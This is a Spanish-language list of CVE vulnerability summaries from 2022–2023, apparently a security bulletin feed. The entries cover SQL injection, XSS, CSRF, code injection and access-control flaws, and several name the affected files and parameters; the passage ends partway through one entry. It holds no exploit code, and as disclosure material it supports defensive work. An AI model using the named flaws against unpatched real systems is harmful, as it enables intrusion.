  • CVE-2022-40188
    Severidad: Pendiente de análisis
    Fecha de publicación: 23/09/2022
    Fecha de última actualización: 08/08/2023
    Knot Resolver versiones anteriores a 5.5.3, permite a atacantes remotos causar una denegación de servicio (consumo de CPU) debido a una complejidad del algoritmo. Durante un ataque, un servidor autoritativo debe devolver grandes conjuntos de NS o conjuntos de direcciones.
  • CVE-2022-41471
    Severidad: Pendiente de análisis
    Fecha de publicación: 17/10/2022
    Fecha de última actualización: 08/08/2023
    74cmsSE versión v3.12.0, permite a atacantes autenticados con privilegios de bajo nivel cambiar arbitrariamente los derechos y credenciales de la cuenta de Super Administrador
  • CVE-2021-42523
    Severidad: Pendiente de análisis
    Fecha de publicación: 25/08/2022
    Fecha de última actualización: 17/07/2023
    Se presentan dos vulnerabilidades de divulgación de información en colord, y son encontradas en los archivos colord/src/cd-device-db.c y colord/src/cd-profile-db.c por separado. Se presentan porque el "err_msg" de "sqlite3_exec" no es liberado después de su uso, mientras que libxml2 enfatiza que el llamador debe liberarlo.
  • CVE-2022-40316
    Severidad: Pendiente de análisis
    Fecha de publicación: 30/09/2022
    Fecha de última actualización: 08/08/2023
    El informe de intentos de actividad de H5P no filtró por grupos, lo que en el modo de grupos separados podría revelar información a profesores no editores sobre intentos/usuarios en grupos a los que no deberían tener acceso
  • Vulnerabilidad en Pomerium (CVE-2023-33189)
    Severidad: Pendiente de análisis
    Fecha de publicación: 30/05/2023
    Fecha de última actualización: 05/06/2023
    Pomerium es un proxy de acceso consciente de la identidad y el contexto. Con peticiones manipuladas, Pomerium puede tomar decisiones de autorización incorrectas. Este problema ha sido corregido en las versiones 0.17.4, 0.18.1, 0.19.2, 0.20.1, 0.21.4 y 0.22.2.
  • Vulnerabilidad en Kernel de Linux (CVE-2023-34256)
    Severidad: Pendiente de análisis
    Fecha de publicación: 31/05/2023
    Fecha de última actualización: 27/07/2023
    Se ha descubierto un problema en el kernel de Linux en las versiones anteriores a 6.3.3. Hay una lectura fuera de límites en crc16 en "lib/crc16.c" cuando se llama dese "fs/ext4/super.c" porque "ext4_group_desc_csum" no comprueba correctamente un desplazamiento.
  • Vulnerabilidad en IBM Maximo Asset Management y en IBM Maximo Application Suite (CVE-2023-32334)
    Severidad: Pendiente de análisis
    Fecha de publicación: 04/06/2023
    Fecha de última actualización: 09/06/2023
    IBM Maximo Asset Management v7.6.1.2, v7.6.1.3 e IBM Maximo Application Suite v8.8.0 almacenan información confidencial en parámetros de URL. Esto puede dar lugar a la divulgación de información si partes no autorizadas tienen acceso a las URL a través de los registros del servidor, el encabezado de referencia o el historial del navegador. IBM X-Force ID: 255074.
  • Vulnerabilidad en IBM Maximo Application Suite (CVE-2023-27861)
    Severidad: Pendiente de análisis
    Fecha de publicación: 04/06/2023
    Fecha de última actualización: 09/06/2023
    IBM Maximo Application Suite - Manage Component v8.8.0 y v8.9.0 transmite información confidencial en texto claro que podría ser interceptada por un atacante mediante técnicas de "man in the middle". IBM X-Force ID: 249208.
  • CVE-2023-32732
    Severidad: Pendiente de análisis
    Fecha de publicación: 09/06/2023
    Fecha de última actualización: 02/08/2023
    gRPC contiene una vulnerabilidad por la que un cliente puede provocar la finalización de la conexión entre un proxy HTTP2 y un servidor gRPC. Un error de codificación en base64 para cabeceras con sufijo "-bin" provocará la desconexión por parte del servidor gRPC, pero suele estar permitido por los proxies HTTP2. Se recomienda actualizar más allá del commit "https://github.com/grpc/grpc/pull/32309".
  • CVE-2023-37192
    Severidad: Pendiente de análisis
    Fecha de publicación: 06/07/2023
    Fecha de última actualización: 17/07/2023
    Los problemas de gestión de memoria y protección en Bitcoin Core v22 permiten a los atacantes modificar la dirección de envío almacenada en la memoria de la aplicación, lo que potencialmente les permite redirigir las transacciones de Bitcoin a los monederos de su elección.
  • CVE-2023-2079
    Severidad: Pendiente de análisis
    Fecha de publicación: 11/07/2023
    Fecha de última actualización: 18/07/2023
    El plugin "Buy Me a Coffee - Button and Widget Plugin" para WordPress es vulnerable a Cross-Site Request Forgery debido a la falta de validación nonce en las funciones "recieve_post", "bmc_disconnect", "name_post" y "widget_post" en versiones hasta 3.7 inclusive. Esto hace posible que atacantes no autenticados actualicen la configuración de los plugins, a través de una solicitud falsificada concedida el atacante puede engañar al administrador de un sitio para realizar una acción como hacer clic en un enlace.
  • CVE-2023-2078
    Severidad: Pendiente de análisis
    Fecha de publicación: 11/07/2023
    Fecha de última actualización: 18/07/2023
    El plugin "Buy Me a Coffee - Button and Widget Plugin" para WordPress es vulnerable a la modificación no autorizada de datos debido a la falta de comprobaciones de capacidad en las funciones "recieve_post", "bmc_disconnect", "name_post" y "widget_post" en versiones hasta la 3.7 inclusive. Esto hace posible que atacantes autenticados, con permisos mínimos como suscriptores, actualicen la configuración de los plugins. El CVE-2023-25030 puede ser un duplicado de este problema.
  • CVE-2021-4417
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/07/2023
    Fecha de última actualización: 18/07/2023
    El plugin The Forminator – Contact Form, Payment Form & Custom Form Builder para WordPress es vulnerable a ataques de tipo Cross-Site Request Forgery en versiones hasta la 1.13.4 inclusive. Esto es debido a la falta o incorrecta validación nonce en la función "listen_for_saving_export_schedule()". Esto hace posible que atacantes no autenticados exporten envíos de formularios a través de una solicitud manipulada concedida y puedan engañar a un administrador del sitio para que realice una acción como hacer clic en un enlace.
  • CVE-2021-4416
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/07/2023
    Fecha de última actualización: 18/07/2023
    El plugin wp-mpdf para WordPress es vulnerable a ataques de tipo Cross-Site Request Forgery en versiones hasta la 3.5.1 inclusive. Esto es debido a la falta o incorrecta validación nonce en la función "mpdf_admin_savepost()". Esto hace posible que atacantes no autenticados guarden los datos POST a través de una petición manipulada, lo que les permite engañar a un administrador del sitio para que realice una acción, como hacer clic en un enlace.
  • CVE-2021-4415
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/07/2023
    Fecha de última actualización: 18/07/2023
    El plugin Sunshine Photo Cart para WordPress es vulnerable a ataques de tipo Cross-Site Request Forgery en versiones hasta la 2.8.28 inclusive. Esto es debido a la falta o incorrecta validación nonce en la función "sunshine_products_quicksave_post()". Esto hace posible que atacantes no autenticados guarden datos POST personalizados a través de una petición manipulada concedida y puedan engañar a un administrador del sitio para que realice una acción, como hacer clic en un enlace.
  • CVE-2023-3644
    Severidad: MEDIA
    Fecha de publicación: 12/07/2023
    Fecha de última actualización: 20/07/2023
    Se ha encontrado una vulnerabilidad en SourceCodester Service Provider Management System v1.0. Se ha declarado como crítica. Esta vulnerabilidad afecta a código desconocido del archivo "/classes/Master.php?f=save_inquiry". La manipulación del argumento id conduce a una inyección sql. El ataque puede iniciarse de forma remota. VDB-233890 es el identificador asignado a esta vulnerabilidad.
  • CVE-2023-3643
    Severidad: ALTA
    Fecha de publicación: 12/07/2023
    Fecha de última actualización: 20/07/2023
    Se ha encontrado una vulnerabilidad en Boss Mini v1.4.0 Build 6221. Se ha clasificado como crítica. Afecta a una parte desconocida del archivo "boss/servlet/document". La manipulación de la ruta del argumento conduce a la inclusión de archivos. Es posible iniciar el ataque de forma remota. El exploit ha sido revelado al público y puede ser utilizado. Se ha asignado a esta vulnerabilidad el identificador VDB-233889.
  • CVE-2023-3635
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/07/2023
    Fecha de última actualización: 26/07/2023
    GzipSource no maneja una excepción que podría surgir al analizar un búfer gzip malformado. Esto puede conducir a la denegación de servicio del cliente Okio cuando se maneja un archivo GZIP manipulado, mediante el uso de la clase "GzipSource".
  • CVE-2023-3343
    Severidad: Pendiente de análisis
    Fecha de publicación: 13/07/2023
    Fecha de última actualización: 25/07/2023
    El plugin User Registration para WordPress es vulnerable a la inyección de objetos PHP en versiones hasta la 3.0.1 inclusive a través de la deserialización de la entrada no fiable del parámetro "profile-pic-url". Esto permite a atacantes autenticados, con permisos de nivel de suscriptor y superiores, inyectar un objeto PHP. Ninguna cadena POP está presente en el plugin vulnerable. Si una cadena POP está presente a través de un plugin adicional o tema instalado en el sistema objetivo, podría permitir al atacante eliminar archivos arbitrarios, recuperar datos sensibles o ejecutar código.
  • CVE-2023-3342
    Severidad: Pendiente de análisis
    Fecha de publicación: 13/07/2023
    Fecha de última actualización: 25/07/2023
    El plugin User Registration para WordPress es vulnerable a la carga de archivos arbitrarios debido a una clave de cifrado codificada y a la falta de validación del tipo de archivo en la función "ur_upload_profile_pic" en las versiones hasta la 3.0.2 inclusive. Esto hace posible que atacantes autenticados con capacidades de nivel suscriptor o superior carguen archivos arbitrarios en el servidor del sitio afectado, lo que puede posibilitar la ejecución remota de código. Esto fue parcialmente parcheado en la versión 3.0.2 y completamente parcheado en la versión 3.0.2.1.
  • CVE-2023-37598
    Severidad: Pendiente de análisis
    Fecha de publicación: 13/07/2023
    Fecha de última actualización: 25/07/2023
    Una vulnerabilidad de tipo Cross-Site Request Forgery (CSRF) en issabel-pbx v4.0.0-6 permite a un atacante remoto causar una denegación de servicio a través de la función de eliminar nuevo fax virtual.
  • CVE-2023-37468
    Severidad: Pendiente de análisis
    Fecha de publicación: 13/07/2023
    Fecha de última actualización: 25/07/2023
    Feedbacksystem es un sistema de feedback personalizado para estudiantes que utiliza inteligencia artificial. Las contraseñas de los usuarios que utilizan el login LDAP se almacenan en texto claro en la base de datos. La contraseña de los usuarios LDAP se pasa sin cifrar en el "LoginController.scala" y se almacena en la base de datos cuando se inicia sesión por primera vez. Los usuarios que utilizan sólo el inicio de sesión local o el inicio de sesión cas no se ven afectados. Este problema ha sido corregido en la versión 1.19.2.
  • Vulnerabilidad en Panda Security VPN para Windows (CVE-2023-37849)
    Severidad: Pendiente de análisis
    Fecha de publicación: 13/07/2023
    Fecha de última actualización: 27/07/2023
    Una vulnerabilidad de secuestro de DLL en Panda Security VPN para Windows anterior a la versión v15.14.8 permite a los atacantes ejecutar código arbitrario mediante la colocación de un archivo DLL manipulado en el mismo directorio que "PANDAVPN.exe".
  • Vulnerabilidad en Issabel-pbx (CVE-2023-37599)
    Severidad: Pendiente de análisis
    Fecha de publicación: 13/07/2023
    Fecha de última actualización: 27/07/2023
    Un problema en issabel-pbx v4.0.0-6 permite a un atacante remoto obtener información sensible a través del directorio "modules".
  • CVE-2023-3689
    Severidad: MEDIA
    Fecha de publicación: 16/07/2023
    Fecha de última actualización: 25/07/2023
    Se ha encontrado una vulnerabilidad clasificada como crítica en Bylancer QuickQR v6.3.7. Esta vulnerabilidad afecta a una funcionalidad desconocida del archivo "/blog" del componente "GET Parameter Hnadler". La manipulación del argumento "s" conduce a una inyección SQL. El ataque puede ser lanzado remotamente. El identificador asociado de esta vulnerabilidad es VDB-234235. NOTA: El vendedor fue contactado a tiempo sobre esta divulgación pero no respondió de ninguna manera.
  • CVE-2023-3690
    Severidad: MEDIA
    Fecha de publicación: 16/07/2023
    Fecha de última actualización: 25/07/2023
    Se ha encontrado una vulnerabilidad, clasificada como crítica, en Bylancer QuickOrder v6.3.7. Este problema afecta a una funcionalidad desconocida del archivo "/blog" del componente "GET Parameter Handler". La manipulación del argumento "s" conduce a una inyección SQL. El ataque puede ser lanzado remotamente. El identificador de esta vulnerabilidad es VDB-234236. NOTA: El vendedor fue contactado a tiempo sobre esta revelación pero no respondió de ninguna manera.
  • CVE-2023-3691
    Severidad: MEDIA
    Fecha de publicación: 16/07/2023
    Fecha de última actualización: 25/07/2023
    Se ha encontrado una vulnerabilidad, clasificada como problemática, en layui hasta la versión 2.8.0-rc.16. Esto afecta a una parte desconocida del componente "HTML Attribute Handler". La manipulación del argumento "title" conduce a Cross-Site Scripting. Es posible iniciar el ataque de forma remota. La actualización a la versión 2.8.0 soluciona este problema. Se recomienda actualizar el componente afectado. Se ha asignado el identificador VDB-234237 a esta vulnerabilidad.
  • CVE-2023-3693
    Severidad: ALTA
    Fecha de publicación: 16/07/2023
    Fecha de última actualización: 26/07/2023
    Se ha encontrado una vulnerabilidad clasificada como crítica en SourceCodester Life Insurance Management System v1.0. Esta vulnerabilidad afecta a código desconocido del archivo "login.php". La manipulación del argumento "username" conduce a una inyección SQL. El ataque puede iniciarse de forma remota. El exploit ha sido revelado al público y puede ser utilizado. El identificador de esta vulnerabilidad es VDB-234244.
  • CVE-2023-33857
    Severidad: Pendiente de análisis
    Fecha de publicación: 16/07/2023
    Fecha de última actualización: 26/07/2023
    IBM InfoSphere Information Server v11.7 podría permitir a un atacante remoto obtener información del sistema utilizando una consulta especialmente manipulada que podría ayudar en futuros ataques contra el sistema. ID de IBM X-Force: 257695.
  • CVE-2023-3694
    Severidad: MEDIA
    Fecha de publicación: 16/07/2023
    Fecha de última actualización: 26/07/2023
    Se ha encontrado una vulnerabilidad, clasificada como crítica, en SourceCodester House Rental and Property Listing v1.0. Este problema afecta a algún procesamiento desconocido del archivo "index.php". La manipulación del argumento "keywords/location" conduce a una inyección SQL. El ataque puede ser iniciado remotamente. El exploit ha sido revelado al público y puede ser utilizado. El identificador asignado a esta vulnerabilidad es VDB-234245.
  • CVE-2023-3695
    Severidad: MEDIA
    Fecha de publicación: 16/07/2023
    Fecha de última actualización: 26/07/2023
    Se ha encontrado una vulnerabilidad clasificada como crítica en Campcode Beauty Salon Management System v1.0. Se ve afectada una función desconocida del archivo "add-product.php". La manipulación del argumento "category" conduce a una inyección SQL. Es posible lanzar el ataque de forma remota. El exploit ha sido revelado al público y puede ser utilizado. El identificador de esta vulnerabilidad es VDB-234252
  • CVE-2023-35898
    Severidad: Pendiente de análisis
    Fecha de publicación: 18/07/2023
    Fecha de última actualización: 28/07/2023
    IBM InfoSphere Information Server v11.7 podría permitir a un usuario autenticado obtener información confidencial debido a una configuración de seguridad insegura en "InfoSphere Data Flow Designer". IBM X-Force ID: 259352.
  • CVE-2022-43910
    Severidad: Pendiente de análisis
    Fecha de publicación: 19/07/2023
    Fecha de última actualización: 27/07/2023
    IBM Security Guardium v11.3 podría permitir a un usuario local escalar sus privilegios debido a controles de permisos inadecuados. ID de IBM X-Force: 240908.
  • Vulnerabilidad en Webile (CVE-2023-3783)
    Severidad: MEDIA
    Fecha de publicación: 20/07/2023
    Fecha de última actualización: 28/07/2023
    Se ha encontrado una vulnerabilidad en Webile v1.0.1. Se ha clasificado como problemática. Una función desconocida del componente "HTTP POST Request Handler" es la afectada. La manipulación del argumento "new_file_name/c" conduce a Cross-Site Scripting (XSS). Es posible lanzar el ataque de forma remota. El exploit ha sido revelado al público y puede ser utilizado. VDB-235050 es el identificador asignado a esta vulnerabilidad.
  • Vulnerabilidad en NxFilter (CVE-2023-3841)
    Severidad: MEDIA
    Fecha de publicación: 23/07/2023
    Fecha de última actualización: 28/07/2023
    Se ha encontrado una vulnerabilidad en NxFilter v4.3.2.5 y se ha clasificado como problemática. Esta vulnerabilidad afecta a código desconocido del archivo "user.jsp". La manipulación conduce a Cross-Site Request Forgery. El ataque puede iniciarse de forma remota. El identificador de esta vulnerabilidad es VDB-235192. NOTA: Se contactó con el proveedor con antelación acerca de esta divulgación, pero no respondió de ninguna manera.
  • Vulnerabilidad en mooSocial mooDating (CVE-2023-3849)
    Severidad: MEDIA
    Fecha de publicación: 23/07/2023
    Fecha de última actualización: 28/07/2023
    Se ha encontrado una vulnerabilidad, clasificada como problemática, en mooSocial mooDating v1.2. Se ve afectada una función desconocida del archivo "/find-a-match" del componente URL Handler. La manipulación conduce a Cross-Site Scripting (XSS). Es posible lanzar el ataque de forma remota. El identificador de esta vulnerabilidad es VDB-235200. NOTA: Se ha intentado ponerse en contacto con el proveedor a tiempo sobre la divulgación pero la dirección de correo oficial no funcionaba correctamente.
  • Vulnerabilidad en Phpscriptpoint Car Listing (CVE-2023-3858)
    Severidad: MEDIA
    Fecha de publicación: 24/07/2023
    Fecha de última actualización: 31/07/2023
    Se ha encontrado una vulnerabilidad en Phpscriptpoint Car Listing v1.6 y se ha clasificado como problemática. Esta vulnerabilidad afecta a código desconocido del archivo "search.php". La manipulación del argumento "country/state/city" conduce a Cross-Site Scripting (XSS). El ataque puede iniciarse de forma remota. VDB-235210 es el identificador asignado a esta vulnerabilidad. NOTA: Se contactó con el proveedor con antelación acerca de esta divulgación, pero no respondió de ninguna manera.
  • Vulnerabilidad en Phpscriptpoint Insurance (CVE-2023-3860)
    Severidad: MEDIA
    Fecha de publicación: 24/07/2023
    Fecha de última actualización: 31/07/2023
    Se ha encontrado una vulnerabilidad en Phpscriptpoint Insurance v1.2. Se ha clasificado como problemática. Se ve afectada una función desconocida del archivo "/page.php". La manipulación conduce a Cross-Site Scripting (XSS). Es posible lanzar el ataque de forma remota. El identificador de esta vulnerabilidad es VDB-235212. NOTA: Se contactó con el proveedor con antelación acerca de esta divulgación, pero no respondió de ninguna manera.
  • Vulnerabilidad en Phpscriptpoint Insurance (CVE-2023-3861)
    Severidad: MEDIA
    Fecha de publicación: 24/07/2023
    Fecha de última actualización: 31/07/2023
    Se ha encontrado una vulnerabilidad en Phpscriptpoint Insurance v1.2. Se ha declarado como problemática. Esta vulnerabilidad afecta a una funcionalidad desconocida del archivo "/search.php". La manipulación conduce a Cross-Site Scripting (XSS). El ataque puede lanzarse de forma remota. Se ha asignado a esta vulnerabilidad el identificador VDB-235213. NOTA: Se contactó con el proveedor con antelación acerca de esta divulgación, pero no respondió de ninguna manera.
  • Vulnerabilidad en Travelmate Travelable Trek Management Solution (CVE-2023-3862)
    Severidad: BAJA
    Fecha de publicación: 24/07/2023
    Fecha de última actualización: 31/07/2023
    Se ha encontrado una vulnerabilidad en Travelmate Travelable Trek Management Solution v1.0. Se ha clasificado como problemática. Este problema afecta a una funcionalidad desconocida del componente "Comment Box Handler". La manipulación del argumento "comment" conduce a Cross-Site Scripting (XSS). El ataque puede ser lanzado remotamente. La complejidad de un ataque es bastante alta. Se sabe que la explotación es difícil. VDB-235214 es el identificador asignado a esta vulnerabilidad. NOTA: Se contactó con el proveedor con antelación acerca de esta divulgación, pero no respondió de ninguna manera.
  • Vulnerabilidad en PaperCut NG (CVE-2023-3486)
    Severidad: Pendiente de análisis
    Fecha de publicación: 25/07/2023
    Fecha de última actualización: 31/07/2023
    Existe una omisión de autenticación en las versiones 22.0.12 y anteriores de PaperCut NG que podría permitir a un atacante no remoto no autenticado cargar archivos arbitrarios en el almacenamiento del host de PaperCut NG. Esto podría agotar los recursos del sistema e impedir que el servicio funcione como se espera.
  • Vulnerabilidad en DataEase (CVE-2023-37257)
    Severidad: Pendiente de análisis
    Fecha de publicación: 25/07/2023
    Fecha de última actualización: 01/08/2023
    DataEase es una herramienta de análisis de visualización de datos de código abierto. Antes de la versión 1.18.9, el panel y el conjunto de datos de DataEase tenían una vulnerabilidad de Cross-Site Scripting Almacenado. La vulnerabilidad se ha corregido en v1.18.9. No hay soluciones alternativas conocidas.
  • Vulnerabilidad en DataEase (CVE-2023-37258)
    Severidad: Pendiente de análisis
    Fecha de publicación: 25/07/2023
    Fecha de última actualización: 01/08/2023
    DataEase es una herramienta de análisis de visualización de datos de código abierto. Antes de la versión 1.18.9, DataEase tiene una vulnerabilidad de inyección SQL que puede eludir las listas negras. La vulnerabilidad se ha corregido en v1.18.9. No hay soluciones alternativas conocidas.
  • Vulnerabilidad en Pligg CMS (CVE-2023-37677)
    Severidad: Pendiente de análisis
    Fecha de publicación: 25/07/2023
    Fecha de última actualización: 02/08/2023
    Se ha descubierto una vulnerabilidad en Pligg CMS v2.0.2 (también conocido como Kliqqi) que permite la ejecución de código remoto en el componente "admin_editor.php".
  • Vulnerabilidad en Phpscriptpoint Lawyer (CVE-2023-3944)
    Severidad: MEDIA
    Fecha de publicación: 25/07/2023
    Fecha de última actualización: 31/07/2023
    Se ha encontrado una vulnerabilidad en Phpscriptpoint Lawyer v1.6 y se ha clasificado como problemática. Este problema afecta a una funcionalidad desconocida del archivo "page.php". La manipulación conduce a Cross-Site Scripting (XSS). El ataque puede ser lanzado remotamente. El identificador de esta vulnerabilidad es VDB-235400. NOTA: Se contactó con el proveedor con antelación acerca de esta divulgación, pero no respondió de ninguna manera.
  • CVE-2023-37919
    Severidad: Pendiente de análisis
    Fecha de publicación: 25/07/2023
    Fecha de última actualización: 04/08/2023
    Cal.com es un software de programación de eventos de código abierto. Una vulnerabilidad permite que las sesiones activas asociadas a una cuenta permanezcan activas incluso después de activar 2FA. Al activar 2FA en una cuenta de Cal.com que está conectada en dos o más dispositivos, la cuenta permanece conectada en el otro dispositivo u otros dispositivos sin tener que verificar la identidad del propietario de la cuenta. En el momento de la publicación, no se conocen parches ni soluciones.
  • Vulnerabilidad en TYPO3 (CVE-2023-38499)
    Severidad: Pendiente de análisis
    Fecha de publicación: 25/07/2023
    Fecha de última actualización: 02/08/2023
    TYPO3 es un sistema de gestión de contenidos web de código abierto basado en PHP. A partir de la versión 9.4.0 y antes de las versiones 9.5.42 ELTS, 10.4.39 ELTS, 11.5.30, y 12.4.4 en escenarios multi-sitio, la enumeración de los parámetros de consulta HTTP "id" y "L" permitía el acceso fuera del alcance al contenido renderizado en el frontend del sitio web. Por ejemplo, esto permitía a los visitantes acceder al contenido de un sitio interno añadiendo parámetros de consulta manuales a la URL de un sitio que estaba disponible públicamente. Las versiones de TYPO3 9.5.42 ELTS, 10.4.39 ELTS, 11.5.30 y 12.4.4 corrigen el problema.
  • Vulnerabilidad en RTX TRAP (CVE-2022-31457)
    Severidad: Pendiente de análisis
    Fecha de publicación: 25/07/2023
    Fecha de última actualización: 02/08/2023
    RTX TRAP v1.0 permite a los atacantes realizar un recorrido por directorios a través de una solicitud manipulada enviada al endpoint "/data/".
  • Vulnerabilidad en Phpscriptpoint Lawyer (CVE-2023-3945)
    Severidad: MEDIA
    Fecha de publicación: 25/07/2023
    Fecha de última actualización: 02/08/2023
    Se ha encontrado una vulnerabilidad en phpscriptpoint Lawyer v1.6. Se ha clasificado como problemática. Afecta a una parte desconocida del archivo "search.php". La manipulación conduce a Cross-Site Scripting (XSS). Es posible iniciar el ataque de forma remota. Se ha asignado a esta vulnerabilidad el identificador VDB-235401. NOTA: Se contactó con el proveedor con antelación acerca de esta divulgación, pero no respondió de ninguna manera.
  • Vulnerabilidad en Plugin Video Conferencing with Zoom para WordPress (CVE-2023-3947)
    Severidad: Pendiente de análisis
    Fecha de publicación: 26/07/2023
    Fecha de última actualización: 02/08/2023
    El plugin Video Conferencing with Zoom para WordPress es vulnerable a la exposición de información sensible debido a que la clave de cifrado está codificada en la función "vczapi_encrypt_decrypt" en versiones hasta la v4.2.1 inclusive. Esto permite a atacantes no autenticados descifrar y ver el identificador y la contraseña de la reunión.
  • Vulnerabilidad en Truedesk (CVE-2022-31456)
    Severidad: Pendiente de análisis
    Fecha de publicación: 26/07/2023
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Cross-Site Scripting (XSS) en Truedesk v1.2.2 permite a los atacantes ejecutar secuencias de comandos web o HTML arbitrarias a través de un payload manipulado inyectado en el parámetro del nombre del equipo.
  • Vulnerabilidad en HCL BigFix Mobile (CVE-2023-28013)
    Severidad: Pendiente de análisis
    Fecha de publicación: 26/07/2023
    Fecha de última actualización: 03/08/2023
    HCL BigFix Mobile es vulnerable a ataques de tipo Cross-Site Scripting (XSS). Un atacante autenticado podría inyectar scripts maliciosos en la aplicación.
  • Vulnerabilidad en HCL BigFix Mobile (CVE-2023-28012)
    Severidad: Pendiente de análisis
    Fecha de publicación: 26/07/2023
    Fecha de última actualización: 03/08/2023
    HCL BigFix Mobile es vulnerable a ataques de inyección de comandos. Un atacante autenticado podría ejecutar comandos shell arbitrarios en el servidor WebUI.
  • Vulnerabilidad en HCL BigFix Mobile (CVE-2023-28014)
    Severidad: Pendiente de análisis
    Fecha de publicación: 26/07/2023
    Fecha de última actualización: 03/08/2023
    HCL BigFix Mobile es vulnerable a ataques de tipo Cross-Site Scripting. Un atacante autenticado podría inyectar scripts maliciosos en la aplicación.
  • Vulnerabilidad en Dell Power Manager (CVE-2023-32450)
    Severidad: Pendiente de análisis
    Fecha de publicación: 27/07/2023
    Fecha de última actualización: 02/08/2023
    Dell Power Manager en versiones de la 3.3 hasta la 3.14 contiene una vulnerabilidad de control de acceso inadecuado. Un usuario malintencionado con pocos privilegios podría aprovechar esta vulnerabilidad para ejecutar código arbitrario con acceso limitado.
  • Vulnerabilidad en Plugin InstaWP Connect para WordPress (CVE-2023-3956)
    Severidad: Pendiente de análisis
    Fecha de publicación: 27/07/2023
    Fecha de última actualización: 02/08/2023
    El plugin InstaWP Connect para WordPress es vulnerable al acceso no autorizado de datos, modificación de datos y pérdida de datos debido a una comprobación de capacidad faltante en la función "events_receiver" en versiones hasta la 0.0.9.18 inclusive. Esto hace posible que atacantes no autenticados añadan, modifiquen o eliminen entradas y taxonomías, instalen, activen o desactiven el plugin, cambien la configuración del personalizador y añadan, modifiquen o eliminen usuarios incluyendo el usuario administrador.
  • Vulnerabilidad en Plugin ACF Photo Gallery Field para WordPress (CVE-2023-3957)
    Severidad: Pendiente de análisis
    Fecha de publicación: 27/07/2023
    Fecha de última actualización: 02/08/2023
    El plugin ACF Photo Gallery Field para WordPress es vulnerable a la modificación no autorizada de datos debido a una restricción insuficiente de la función "apg_profile_update" en las versiones hasta la 1.9 inclusive. Esto hace posible que atacantes autenticados, con permisos de nivel de suscriptor o superior actualicen la información de usuario arbitrariamente. El valor de la información sólo puede ser una cadena.
  • Vulnerabilidad en Wpstream (CVE-2023-38512)
    Severidad: Pendiente de análisis
    Fecha de publicación: 27/07/2023
    Fecha de última actualización: 02/08/2023
    Se ha encontrado una vulnerabilidad de tipo Cross-Site Request Forgery (CSRF) en el plugin para WordPress WpStream – Live Streaming, Video on Demand, Pay Per View de WpStream en versiones anteriores a la 4.5.4 inclusive.
  • Vulnerabilidad en Atmail (CVE-2022-31200)
    Severidad: Pendiente de análisis
    Fecha de publicación: 27/07/2023
    Fecha de última actualización: 03/08/2023
    Atmail v5.62 permite ataques de tipo Cross-Site Scripting (XSS) a través del campo "mail/parse.php?file=html/$this-%3ELanguage/help/filexp.html&FirstLoad=1&HelpFile=file.html Search Terms".
  • Vulnerabilidad en Jinfornet Jreport (CVE-2020-22623)
    Severidad: Pendiente de análisis
    Fecha de publicación: 27/07/2023
    Fecha de última actualización: 03/08/2023
    La vulnerabilidad de salto de directorios en Jinfornet Jreport v15.6 permite a atacantes no autenticados obtener información confidencial.
  • Vulnerabilidad en Yii 2 (CVE-2022-31454)
    Severidad: Pendiente de análisis
    Fecha de publicación: 28/07/2023
    Fecha de última actualización: 03/08/2023
    Se ha descubierto que Yii 2 v2.0.45 contiene una vulnerabilidad Cross-Site Scripting (XSS) a través del endpoint "/books".
  • Vulnerabilidad en Phpscriptpoint RecipePoint (CVE-2023-3984)
    Severidad: MEDIA
    Fecha de publicación: 28/07/2023
    Fecha de última actualización: 03/08/2023
    Se ha encontrado una vulnerabilidad, clasificada como crítica, en Phpscriptpoint RecipePoint v1.9. Afecta a una parte desconocida del fichero "/recipe-result". La manipulación del argumento "text/category/type/difficulty/cuisine/cooking_method" conduce a una inyección SQL. Es posible iniciar el ataque de forma remota. El identificador VDB-235605 fue asignado a esta vulnerabilidad.
  • Vulnerabilidad en BoofCV (CVE-2023-39010)
    Severidad: Pendiente de análisis
    Fecha de publicación: 28/07/2023
    Fecha de última actualización: 03/08/2023
    Se ha descubierto que BoofCV v0.42 contiene una vulnerabilidad de inyección de código a través del componente "boofcv.io.calibration.CalibrationIO.load". Esta vulnerabilidad se aprovecha cargando un archivo manipulado de calibración de cámara.
  • Vulnerabilidad en Duke (CVE-2023-39013)
    Severidad: Pendiente de análisis
    Fecha de publicación: 28/07/2023
    Fecha de última actualización: 03/08/2023
    Se ha descubierto que Duke v1.2 e inferiores contienen una vulnerabilidad de inyección de código a través del componente "no.priv.garshol.duke.server.CommonJTimer.init".
  • Vulnerabilidad en Quartz-jobs (CVE-2023-39017)
    Severidad: Pendiente de análisis
    Fecha de publicación: 28/07/2023
    Fecha de última actualización: 03/08/2023
    Se ha descubierto que Quartz-jobs v2.3.2 e inferiores contienen una vulnerabilidad de inyección de código en el componente "org.quartz.jobs.ee.jms.SendQueueMessageJob.execute". Esta vulnerabilidad se aprovecha pasando un argumento no comprobado.
  • Vulnerabilidad en FFmpeg (CVE-2023-39018)
    Severidad: Pendiente de análisis
    Fecha de publicación: 28/07/2023
    Fecha de última actualización: 03/08/2023
    Se ha descubierto que FFmpeg v0.7.0 e inferiores contienen una vulnerabilidad de inyección de código en el componente "net.bramp.ffmpeg.FFmpeg..". Esta vulnerabilidad se aprovecha pasando un argumento no comprobado.
  • Vulnerabilidad en standford-parser (CVE-2023-39020)
    Severidad: Pendiente de análisis
    Fecha de publicación: 28/07/2023
    Fecha de última actualización: 03/08/2023
    Se ha descubierto que standford-parser v3.9.2 y versiones inferiores contienen una vulnerabilidad de inyección de código en el componente "edu.stanford.nlp.io.getBZip2PipedInputStream". Esta vulnerabilidad se aprovecha pasando un argumento no comprobado.
  • Vulnerabilidad en Wix-embedded-mysql (CVE-2023-39021)
    Severidad: Pendiente de análisis
    Fecha de publicación: 28/07/2023
    Fecha de última actualización: 03/08/2023
    Se ha descubierto que wix-embedded-mysql v4.6.1 e inferiores contienen una vulnerabilidad de inyección de código en el componente "component com.wix.mysql.distribution.Setup.apply". Esta vulnerabilidad se aprovecha pasando un argumento no comprobado.
  • Vulnerabilidad en Oscore (CVE-2023-39022)
    Severidad: Pendiente de análisis
    Fecha de publicación: 28/07/2023
    Fecha de última actualización: 03/08/2023
    Se ha descubierto que Oscore v2.2.6 e inferiores contienen una vulnerabilidad de inyección de código en el componente "com.opensymphony.util.EJBUtils.createStateless". Esta vulnerabilidad se aprovecha pasando un argumento no comprobado.
  • Vulnerabilidad en University Compass (CVE-2023-39023)
    Severidad: Pendiente de análisis
